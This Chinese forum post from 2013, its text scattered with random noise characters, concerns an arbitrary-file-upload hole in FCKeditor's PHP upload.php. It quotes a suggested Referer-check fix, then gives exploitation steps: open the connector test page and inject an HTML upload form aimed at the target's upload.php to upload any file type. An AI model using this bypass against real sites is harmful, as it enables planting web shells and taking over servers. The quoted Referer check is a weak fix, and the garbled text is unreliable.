漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php2 v: |3 A5 w l* Q! g5 F! S, E0 q; W
网上给出的修复方案是 Z$ ^) P% c9 `' t5 p; y& v' k$ F& x
修复方法,删除FCK编辑器用其他的编辑器
3 a [ j, H; m% b2 h或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件4 ^+ v: C' N4 G7 c, Y$ y
在$ N$ c: S. e% M9 U! Z
require(‘config.php’);0 a- g7 b1 _- T0 A
require(‘util.php’); t0 B+ {# F4 |
的下面添加以下代码—————————–& s' g& K5 X# G' v
//防止外部提交* l" r5 h8 h$ r7 U m
function outsidepost()
5 `) J: v& Z* |; E1 _; _& m{5 j" B! M) ~' p" k- \6 s6 L
$servername=$_SERVER['SERVER_NAME'];/ Q. z6 A. P) G! N6 a
$sub_from=@$_SERVER['HTTP_REFERER'];7 `3 }. j! R1 [7 u& w
$sub_len=strlen($servername);
" _ }. N. B0 W8 c( }; s- J- e$checkfrom=substr($sub_from,7,$sub_len);$ c( t2 i! E: {* \
if($checkfrom!=$servername){
# x8 G$ b( Y0 t6 {echo(“you don’t outsidepost!”);
- H# w4 f2 R/ Q, cexit;7 x6 _* m. x8 ]2 v) i" R9 t
}
M G- e2 k8 U) b+ H6 v6 w}
5 ]) J+ H+ x3 o, Toutsidepost();% G# f) v8 a9 }. Z
防止外部提交,但是没有防止内部提交,
: R7 M2 v# u$ N" D2 ?/ @1 G利用方法:
1 f5 |/ s0 q1 u6 I3 {1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
5 M1 n' }9 K, `/ ^0 W. e5 ?2,在Current Folder 框输入
& C) ~/ |+ I+ \) X% {- x<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>* A5 z! ^! O) k' b }
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。) t2 @5 p3 q! p7 x/ Y u9 U
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对